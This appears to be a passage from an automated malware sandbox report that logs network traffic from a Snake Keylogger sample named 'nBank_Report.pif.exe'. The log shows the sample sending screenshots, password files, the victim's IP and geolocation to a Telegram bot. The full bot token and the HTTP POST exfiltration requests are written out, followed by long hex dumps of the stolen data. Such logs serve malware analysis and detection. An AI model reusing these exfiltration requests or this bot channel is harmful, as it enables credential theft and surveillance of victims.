                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-09-26 09:34:26 UTC505INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 33 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 32 34 30 31 32 38 34 32 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 58 6d 61 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 6d 61 6e 75 5f 4c 6f 67 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 33 39 34 35 35 30 32 34 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 20 5c 75 64 38 33 64 5c 75 64 63 30 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 36 37 35 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 33 32 36 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22
                                              Data Ascii: {"ok":true,"result":{"message_id":6349,"from":{"id":6240128422,"is_bot":true,"first_name":"Xmas","username":"Mmanu_LogBot"},"chat":{"id":1394550246,"first_name":"Walton \ud83d\udc08","username":"Walton675","type":"private"},"date":1727343266,"document":{"


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              38192.168.2.1049767149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:34:27 UTC694OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dce1b2a2b09d87
                                              Host: api.telegram.org
                                              Content-Length: 673762
                                              2024-09-26 09:34:27 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 31 62 32 61 32 62 30 39 64 38 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 62 72 6f 6b 5c 44 6f 63 75 6d 65 6e 74 73 5c 53 6e 61 6b 65 4b 65 79 6c 6f 67 67 65 72 5c 53 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00
                                              Data Ascii: --------------------------8dce1b2a2b09d87Content-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\SnakeKeylogger\Screenshot.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGB
                                              2024-09-26 09:34:27 UTC16355OUTData Raw: 70 2b 00 3f 5d fd f6 de fd 43 91 37 57 22 89 b7 ae 38 f1 c4 13 ab 17 7f fb db 50 fc c1 3b be fb 50 8f dc fb ef 6b ee ac 3e 76 ce 23 d5 0f 7e f2 74 96 7c 79 4c 7c ec ec 87 73 4e 75 af 3d fa 9e d9 02 b0 91 7f ad 00 3c fc f0 50 e0 cd 97 45 01 b8 b0 84 12 6f 3e 2c 0a c0 b1 88 a4 de 38 44 d2 cf 89 a4 9f 13 49 3f 27 92 7d 83 88 e4 de 28 bc 54 02 50 44 72 6f 14 22 f9 07 bf 2f 02 50 eb 45 01 18 f3 fb 2e 00 a3 6b c1 4e 17 a9 37 00 c9 3f 51 0a c0 48 fa 39 4b 02 d9 e7 44 e2 cf 51 27 60 3f 4a d1 27 fa c5 95 f3 f5 30 01 18 31 f5 d6 9b 7a e8 97 ef 27 02 3d ee 02 50 12 50 f3 48 f4 0d 93 80 3d f9 37 5d df 8a 3f 97 80 8c ea 06 e4 ad c0 ed 4b 39 9a 8e 40 31 aa 04 74 b1 87 ec 93 50 94 08 24 5e 4a 45 e6 fe 0c 40 49 c0 ee 6e 57 65 3a ab af 6c e5 1e e8 3a b0 83 e4 53 5e d2 cf
                                              Data Ascii: p+?]C7W"8P;Pk>v#~t|yL|sNu=<PEo>,8DI?'}(TPDro"/PE.kN7?QH9KDQ'`?J'01z'=PPH=7]?K9@1tP$^JE@InWe:l:S^
                                              2024-09-26 09:34:27 UTC16355OUTData Raw: 27 99 c7 1c 5c e2 b5 22 af 41 39 e5 d5 fd a7 58 b9 8f b7 01 23 f5 b8 ee 2b f1 27 d1 e7 73 49 3f 09 43 49 43 64 9e 04 a0 3a 00 91 7d 8c 90 af f9 36 22 b0 ec 0a 24 87 dc 93 d8 93 00 94 dc 23 07 ca a9 03 d0 af 00 4b fc 39 2e e9 94 97 d8 5b b1 7d fa 6e 29 a7 1a 09 c3 72 af f6 79 9e 98 20 c6 35 60 c9 39 5d fb 45 ca b9 00 94 d4 d3 5c 48 f0 11 77 d9 a7 5a c5 bd ab 50 67 13 17 ea f4 03 e6 92 74 c8 39 49 3d e5 5d 00 32 92 07 f6 d1 d1 c7 28 c1 47 2d 75 c4 a9 25 a6 33 34 47 14 ea 85 1f 92 76 42 02 2e 5a 4b d2 29 ee 35 ea 1c 64 2c cf 50 8d f6 e8 0c cd 91 7c 82 b5 ea b8 fa db d9 f0 dc 3c d7 77 05 e6 48 36 90 84 73 11 07 08 40 09 3e 72 de a9 a7 7a 9d 51 9e a3 b5 ce 61 ae ce 3e ce d4 da af 14 eb 5c c6 dc 1d b8 71 fa f9 37 48 bf af a6 e3 0f f1 c7 a8 39 42 cf 5f f4 21 d9
                                              Data Ascii: '\"A9X#+'sI?CICd:}6"$#K9.[}n)ry 5`9]E\HwZPgt9I=]2(G-u%34GvB.ZK)5d,P|<wH6s@>rzQa>\q7H9B_!
                                              2024-09-26 09:34:27 UTC16355OUTData Raw: c5 5c bf f8 a4 89 a4 9f 13 49 3f 27 92 78 f3 21 92 78 f3 21 92 7e 4e 24 f4 c6 21 92 7a e3 10 49 be 41 f4 c8 bb 49 10 49 bd 71 08 84 5f 49 24 ee 26 45 24 fd 9c 48 e4 cd 95 59 02 30 51 0a bd 88 1e a1 d7 27 de 8f 48 f2 0d 22 92 7c 83 88 44 de 5c 79 b5 09 c0 51 98 25 f4 02 e9 e7 cc aa 1f 83 59 02 30 11 8b bd 51 99 bf 00 9c fe c8 dc c4 9f 70 29 17 11 9d e9 f9 ee 87 7a c9 b1 40 fe 95 cc 74 01 f6 8a 3f 11 c9 bc b9 10 49 3f 27 92 7c 83 90 f8 eb be e7 c7 99 48 fa 39 33 9d 7e 33 b8 cc 9b 3f b3 a5 9f d3 4f 00 82 64 1e 44 79 70 e1 57 0a 40 40 f4 2d d9 2f 7d 4e 42 02 b0 fb 96 54 97 46 49 c1 be a4 fd 12 7d fd 04 a0 84 9f bf 10 c4 c9 12 0f 09 87 b8 43 c4 21 e9 10 70 29 4e 87 a0 72 fd 68 3b fe 4c de 49 e8 29 5e a2 9c ba 0a 15 f3 1a 09 be 48 00 ea 6a b1 04 a0 04 1f a3 cf
                                              Data Ascii: \I?'x!x!~N$!zIAIIq_I$&E$HY0Q'H"|D\yQ%Y0Qp)z@t?I?'|H93~3?OdDypW@@-/}NBTFI}C!p)Nrh;LI)^Hj
                                              2024-09-26 09:34:27 UTC16355OUTData Raw: ed 34 99 f4 8b b4 e2 6e 59 06 91 37 23 be 88 cd 08 40 a9 82 2f 89 4f 90 48 bc ad b2 1d 02 30 93 7d f3 98 55 05 b8 88 4c e0 6d 95 4c f4 cd 22 93 7d 19 ad d8 db 28 99 f4 8b 64 d2 2f 12 05 de 2c 26 84 5e 13 8f 63 63 13 f9 89 e4 5b c4 13 f5 08 30 42 30 93 7c f3 b0 02 30 ca bf 09 09 b8 41 01 18 e3 91 c3 21 00 db d8 20 f9 02 5b 11 80 b3 50 0c 9a ab fc 9b 14 80 eb c2 2e 42 3c ce c5 ea 3d 65 9f 79 31 e6 9a 98 e3 7c 46 94 75 ad c4 53 de 01 7d c7 d9 1a 89 73 71 5e 01 48 6b cc 4a c2 2a 02 7b d1 57 ab fd 7a f9 37 7a d1 75 c3 b1 e0 f6 fb 7f 11 65 1d ad 63 5a 05 60 94 80 cc 29 ff e2 b7 04 33 c8 9f 75 c4 97 3e b1 bd bd 00 8c 79 10 e5 df 2c 10 81 b1 2a 90 18 55 81 11 e3 e6 0b 63 04 22 22 0f b9 67 c5 1f 47 81 11 7c c8 3d 50 fe 99 07 cc 03 fd a9 5b 7b 0b ca 3f 2b fa 3c 22
                                              Data Ascii: 4nY7#@/OH0}ULmL"}(d/,&^cc[0B0|0A! [P.B<=ey1|FuS}sq^HkJ*{Wz7zuecZ`)3u>y,*Uc""gG|=P[{?+<"
                                              2024-09-26 09:34:27 UTC16355OUTData Raw: fe 6b dd 23 df f8 f5 ee d1 6f bc b9 7b f4 5b bf d5 fd cf 7f f4 cd f4 d9 db 41 26 fd 96 21 13 7e 2d 0a c0 4c d6 ed 14 1b 96 80 a9 fc 83 5e d0 4d 80 f4 0b 6d 2f eb a2 c0 9b 16 79 0d ee 75 fe dd f5 7b 7d fc 7e 26 2e f3 80 f8 cd 41 de 71 e2 9b 83 48 c0 f2 f7 2e f2 af 90 dd 36 cc 0d c3 c8 3e a4 5f 94 80 8a 40 a9 c7 85 b9 d9 b8 3c 73 ed bc 7b ca 3f 5b e5 7d e2 8d c2 f1 9b 81 f1 3b 82 85 ad 0a c0 54 e6 2d 60 ad 3c 0f 26 e2 89 74 9b 85 47 86 b7 f3 e8 f0 da 99 e5 bd e6 90 c9 bc cd 90 c9 3f c8 a4 dd 76 92 49 bf 48 26 ed b6 93 69 a1 b7 2c e5 e7 98 c7 3b a7 a5 5f 64 57 00 96 3d e6 b2 2e fb 32 32 e9 17 59 24 00 b7 5b 02 3e d1 04 e0 9e 5f fb 76 a5 15 7c c6 67 cd 0b f2 0f 32 e9 97 81 f0 b3 6d c9 04 20 3c 16 02 70 a3 7b ac fd dc a4 f0 6b c9 a4 5f 24 93 7e 91 9d 16 80 32
                                              Data Ascii: k#o{[A&!~-L^Mm/yu{}~&.AqH.6>_@<s{?[};T-`<&tG?vIH&i,;_dW=.22Y$[>_v|g2m <p{k_$~2
                                              2024-09-26 09:34:27 UTC16355OUTData Raw: fd dd d0 79 13 b0 52 10 d1 47 65 9f 52 cf 3e 72 4f f1 47 4c 29 48 cb d8 98 15 7f c2 18 e9 47 5b 05 df a9 65 bf e7 8f e5 1f 2d 39 cc 73 6c f8 e0 8b cb cf 56 e6 bd 04 84 2a 3d 5a 04 a0 62 4f a9 27 cc 2b f2 5c 47 5f c1 c7 1e 62 9e c4 79 fa ac 45 f4 71 b9 08 d0 8f 42 f0 e0 0b cb ef b3 11 7e f4 15 82 75 dc cb 3a 5a a5 1e ad 55 7f ce 29 ff 84 b9 b6 da 4f 8c 21 17 ad f8 43 fe 29 00 db a3 c0 7e 1f 90 98 b2 0e 81 c7 85 1d de f6 3b 08 be 5e 02 22 dd 20 ca 3c 45 60 a4 9d 57 0e 3a 87 e0 43 00 5a f9 a7 fc 53 0c 46 39 28 4a 42 f0 7d ac 4a e4 9d a2 00 ac 92 af af 56 04 e5 df 10 3b 66 2c f2 a2 e4 43 e6 f9 0d c0 4c ec 39 36 df 18 90 0f 4a 3e e7 b3 9c 4a c9 43 bc 29 f9 40 79 c7 1c fd 38 6e f1 db 81 5c 26 c2 98 3e 2d 6b 10 7d 1c f3 a5 8f f0 23 4e cc e7 b0 27 63 f7 6a 61 ae
                                              Data Ascii: yRGeR>rOGL)HG[e-9slV*=ZbO'+\G_byEqB~u:ZU)O!C)~;^" <E`W:CZSF9(JB}JV;f,CL96J>JC)@y8n\&>-k}#N'cja
                                              2024-09-26 09:34:27 UTC16355OUTData Raw: c8 39 84 9e 44 1d 73 48 3c 49 3d 0f 79 eb f7 b6 9f b3 b5 5a a7 be 17 7c ac a7 95 44 64 5e e3 a6 ff 25 6b 7b 15 7f 5e fc 51 f1 a7 be c6 42 eb 26 2e 00 21 12 65 cf 57 22 e9 e7 e9 97 6d f3 89 d6 8c 43 b4 e7 78 20 eb 96 83 66 7f 2f 00 5f c8 12 30 92 7f 10 ca be 88 40 f6 45 44 92 6e 18 d1 1e 9e 68 8d 67 90 88 f3 92 6e 39 a9 5f 77 a5 89 a4 9f 27 96 7e 1e fb 1c 4b a0 53 d1 c6 2f b6 f7 e7 e8 5e 34 08 fb 39 8f 40 28 03 81 8a bd 8b ec cf fb 20 bc 18 f4 14 39 88 ec 9b bd 84 8b 43 1a 09 38 f7 89 94 f1 95 81 d3 5b 79 76 a0 fd 7d 97 5f cf 3e 5b 3e 22 ac 8a 40 a4 20 7d e3 02 fb 3e cf 6f c8 63 71 8e e5 0d 22 92 76 02 49 17 c5 c7 a1 12 7e 35 a1 f4 f3 04 d2 ad 9f de 05 1f 8b 23 da 73 74 22 a9 37 0e 5e f4 0d 62 55 00 da eb ae 0a c0 b1 58 39 01 b8 44 4e 89 c5 de b8 f8 63 c1
                                              Data Ascii: 9DsH<I=yZ|Dd^%k{^QB&.!eW"mCx f/_0@EDnhgn9_w'~KS/^49@( 9C8[yv}_>[>"@ }>ocq"vI~5#st"7^bUX9DNc
                                              2024-09-26 09:34:27 UTC16355OUTData Raw: a3 8f a8 f3 c2 6e 6e 1f cb d9 d3 e6 8b ec 63 cc 3c e3 7c 69 07 d2 ce 72 25 fe 88 7b 61 a8 b8 a4 1f 6b 69 95 e3 e7 e8 eb 96 5f 2f f2 40 c2 ce 0b c2 7a 4e e3 2c ea 0c 62 7e bf 5a 1a 4a fe f9 18 95 7e b4 bc 8e e6 59 ab 31 cf f2 93 70 43 be 49 f0 49 c4 f9 2a 3f 72 98 63 8d 17 86 9a f7 e2 cf af 51 9f b8 88 62 3e 3e 59 01 88 90 fb e8 f5 c9 fe 8e 4e e9 e6 2f da 7f 5c af 68 64 dd 24 44 dd b9 df 49 9d f7 de 96 ae 4c 8f a5 8d 1f b8 a8 79 c6 1f 12 30 ca 15 63 4a c3 3e 21 17 cc d5 31 cf d4 67 ec 1f 63 55 cc ef b7 10 12 6d cb 4d 24 cf 20 ca 89 62 bb 2a 91 ac 5b 2a d3 9f b2 7f d4 17 14 8b e4 dc 4a 10 4a 3f 4f 20 ed 86 11 c9 b8 28 4f 44 f9 93 20 92 7d 11 a1 f4 f3 04 52 6d 18 91 c4 5b 0a d1 6b 8c 43 24 fd 3c 91 b4 9b 24 91 f4 f3 44 a2 6f 10 b1 a0 5b 6e ec 67 b0 04 01 d8
                                              Data Ascii: nnc<|ir%{aki_/@zN,b~ZJ~Y1pCII*?rcQb>>YN/\hd$DILy0cJ>!1gcUmM$ b*[*JJ?O (OD }Rm[kC$<$Do[ng
                                              2024-09-26 09:34:27 UTC16355OUTData Raw: 61 3f e5 f8 bd 04 92 ce 1f df f5 92 0f 38 c6 4b ab 79 55 fb 69 5e 55 82 1a 93 e3 f7 5b 15 80 81 14 7b 21 11 4a b9 15 c4 cb b4 9d 45 24 e6 46 cd 5b 2a 91 f4 f3 c4 52 6f 1c ec bd 2f 23 ab 02 d0 7e 8e 63 30 6f 8f 40 ea 8d 43 24 eb 96 83 5a e4 0d a2 16 74 0b cd 2f 99 40 ca ad 24 a1 e0 73 0c bc 5c 44 f2 af 8c a7 ca 25 22 35 cf 77 01 98 2b f4 0a dd 73 6d 3f 2f 00 c5 79 36 06 57 15 d8 56 06 9e 6f 20 f7 2e b4 ff c6 6f 7a 3a 75 37 73 bb f0 33 69 fa e2 67 d3 ec 45 cf a6 35 17 53 15 f8 cb b4 7e 6b 4a bb 6d 4b 69 dd 96 94 d6 6c 7e 36 4d 9d 6f f9 bc 8e 7f 6e 20 b2 2f 0b 3f 27 fa 90 81 12 84 5e fe 65 8a cc 3b e3 c1 81 48 04 0e 22 94 7a e3 10 48 bb 49 12 49 3f 4f 24 fd 3c a1 f4 73 44 cf fd f3 44 72 6f 14 06 09 40 78 3e 09 c0 2c e9 5c f5 5f 4d 2d f4 16 4b 24 01 01 09 58
                                              Data Ascii: a?8KyUi^U[{!JE$F[*Ro/#~c0o@C$Zt/@$s\D%"5w+sm?/y6WVo .oz:u7s3igE5S~kJmKil~6Mon /?'^e;H"zHII?O$<sDDro@x>,\_M-K$X
                                              2024-09-26 09:34:28 UTC389INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:34:28 GMT
                                              Content-Type: application/json
                                              Content-Length: 1230
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              39192.168.2.1049768149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:34:29 UTC348OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dce2001d4516aa
                                              Host: api.telegram.org
                                              Content-Length: 546
                                              Connection: Keep-Alive
                                              2024-09-26 09:34:29 UTC546OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 32 30 30 31 64 34 35 31 36 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 62 72 6f 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 35 3a 33 33 3a 32 31 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20 38
                                              Data Ascii: --------------------------8dce2001d4516aaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:585948Date and Time: 26/09/2024 / 05:33:21Client IP: 8
                                              2024-09-26 09:34:29 UTC388INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:34:29 GMT
                                              Content-Type: application/json
                                              Content-Length: 505
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-09-26 09:34:29 UTC505INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 33 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 32 34 30 31 32 38 34 32 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 58 6d 61 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 6d 61 6e 75 5f 4c 6f 67 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 33 39 34 35 35 30 32 34 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 20 5c 75 64 38 33 64 5c 75 64 63 30 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 36 37 35 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 33 32 36 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22
                                              Data Ascii: {"ok":true,"result":{"message_id":6351,"from":{"id":6240128422,"is_bot":true,"first_name":"Xmas","username":"Mmanu_LogBot"},"chat":{"id":1394550246,"first_name":"Walton \ud83d\udc08","username":"Walton675","type":"private"},"date":1727343269,"document":{"


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              40192.168.2.1049769149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:34:30 UTC694OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dce2346f070faf
                                              Host: api.telegram.org
                                              Content-Length: 673762
                                              2024-09-26 09:34:30 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 32 33 34 36 66 30 37 30 66 61 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 62 72 6f 6b 5c 44 6f 63 75 6d 65 6e 74 73 5c 53 6e 61 6b 65 4b 65 79 6c 6f 67 67 65 72 5c 53 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00
                                              Data Ascii: --------------------------8dce2346f070fafContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\SnakeKeylogger\Screenshot.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGB
                                              2024-09-26 09:34:30 UTC16355OUTData Raw: 70 2b 00 3f 5d fd f6 de fd 43 91 37 57 22 89 b7 ae 38 f1 c4 13 ab 17 7f fb db 50 fc c1 3b be fb 50 8f dc fb ef 6b ee ac 3e 76 ce 23 d5 0f 7e f2 74 96 7c 79 4c 7c ec ec 87 73 4e 75 af 3d fa 9e d9 02 b0 91 7f ad 00 3c fc f0 50 e0 cd 97 45 01 b8 b0 84 12 6f 3e 2c 0a c0 b1 88 a4 de 38 44 d2 cf 89 a4 9f 13 49 3f 27 92 7d 83 88 e4 de 28 bc 54 02 50 44 72 6f 14 22 f9 07 bf 2f 02 50 eb 45 01 18 f3 fb 2e 00 a3 6b c1 4e 17 a9 37 00 c9 3f 51 0a c0 48 fa 39 4b 02 d9 e7 44 e2 cf 51 27 60 3f 4a d1 27 fa c5 95 f3 f5 30 01 18 31 f5 d6 9b 7a e8 97 ef 27 02 3d ee 02 50 12 50 f3 48 f4 0d 93 80 3d f9 37 5d df 8a 3f 97 80 8c ea 06 e4 ad c0 ed 4b 39 9a 8e 40 31 aa 04 74 b1 87 ec 93 50 94 08 24 5e 4a 45 e6 fe 0c 40 49 c0 ee 6e 57 65 3a ab af 6c e5 1e e8 3a b0 83 e4 53 5e d2 cf
                                              Data Ascii: p+?]C7W"8P;Pk>v#~t|yL|sNu=<PEo>,8DI?'}(TPDro"/PE.kN7?QH9KDQ'`?J'01z'=PPH=7]?K9@1tP$^JE@InWe:l:S^
                                              2024-09-26 09:34:30 UTC16355OUTData Raw: 27 99 c7 1c 5c e2 b5 22 af 41 39 e5 d5 fd a7 58 b9 8f b7 01 23 f5 b8 ee 2b f1 27 d1 e7 73 49 3f 09 43 49 43 64 9e 04 a0 3a 00 91 7d 8c 90 af f9 36 22 b0 ec 0a 24 87 dc 93 d8 93 00 94 dc 23 07 ca a9 03 d0 af 00 4b fc 39 2e e9 94 97 d8 5b b1 7d fa 6e 29 a7 1a 09 c3 72 af f6 79 9e 98 20 c6 35 60 c9 39 5d fb 45 ca b9 00 94 d4 d3 5c 48 f0 11 77 d9 a7 5a c5 bd ab 50 67 13 17 ea f4 03 e6 92 74 c8 39 49 3d e5 5d 00 32 92 07 f6 d1 d1 c7 28 c1 47 2d 75 c4 a9 25 a6 33 34 47 14 ea 85 1f 92 76 42 02 2e 5a 4b d2 29 ee 35 ea 1c 64 2c cf 50 8d f6 e8 0c cd 91 7c 82 b5 ea b8 fa db d9 f0 dc 3c d7 77 05 e6 48 36 90 84 73 11 07 08 40 09 3e 72 de a9 a7 7a 9d 51 9e a3 b5 ce 61 ae ce 3e ce d4 da af 14 eb 5c c6 dc 1d b8 71 fa f9 37 48 bf af a6 e3 0f f1 c7 a8 39 42 cf 5f f4 21 d9
                                              Data Ascii: '\"A9X#+'sI?CICd:}6"$#K9.[}n)ry 5`9]E\HwZPgt9I=]2(G-u%34GvB.ZK)5d,P|<wH6s@>rzQa>\q7H9B_!
                                              2024-09-26 09:34:30 UTC16355OUTData Raw: c5 5c bf f8 a4 89 a4 9f 13 49 3f 27 92 78 f3 21 92 78 f3 21 92 7e 4e 24 f4 c6 21 92 7a e3 10 49 be 41 f4 c8 bb 49 10 49 bd 71 08 84 5f 49 24 ee 26 45 24 fd 9c 48 e4 cd 95 59 02 30 51 0a bd 88 1e a1 d7 27 de 8f 48 f2 0d 22 92 7c 83 88 44 de 5c 79 b5 09 c0 51 98 25 f4 02 e9 e7 cc aa 1f 83 59 02 30 11 8b bd 51 99 bf 00 9c fe c8 dc c4 9f 70 29 17 11 9d e9 f9 ee 87 7a c9 b1 40 fe 95 cc 74 01 f6 8a 3f 11 c9 bc b9 10 49 3f 27 92 7c 83 90 f8 eb be e7 c7 99 48 fa 39 33 9d 7e 33 b8 cc 9b 3f b3 a5 9f d3 4f 00 82 64 1e 44 79 70 e1 57 0a 40 40 f4 2d d9 2f 7d 4e 42 02 b0 fb 96 54 97 46 49 c1 be a4 fd 12 7d fd 04 a0 84 9f bf 10 c4 c9 12 0f 09 87 b8 43 c4 21 e9 10 70 29 4e 87 a0 72 fd 68 3b fe 4c de 49 e8 29 5e a2 9c ba 0a 15 f3 1a 09 be 48 00 ea 6a b1 04 a0 04 1f a3 cf
                                              Data Ascii: \I?'x!x!~N$!zIAIIq_I$&E$HY0Q'H"|D\yQ%Y0Qp)z@t?I?'|H93~3?OdDypW@@-/}NBTFI}C!p)Nrh;LI)^Hj
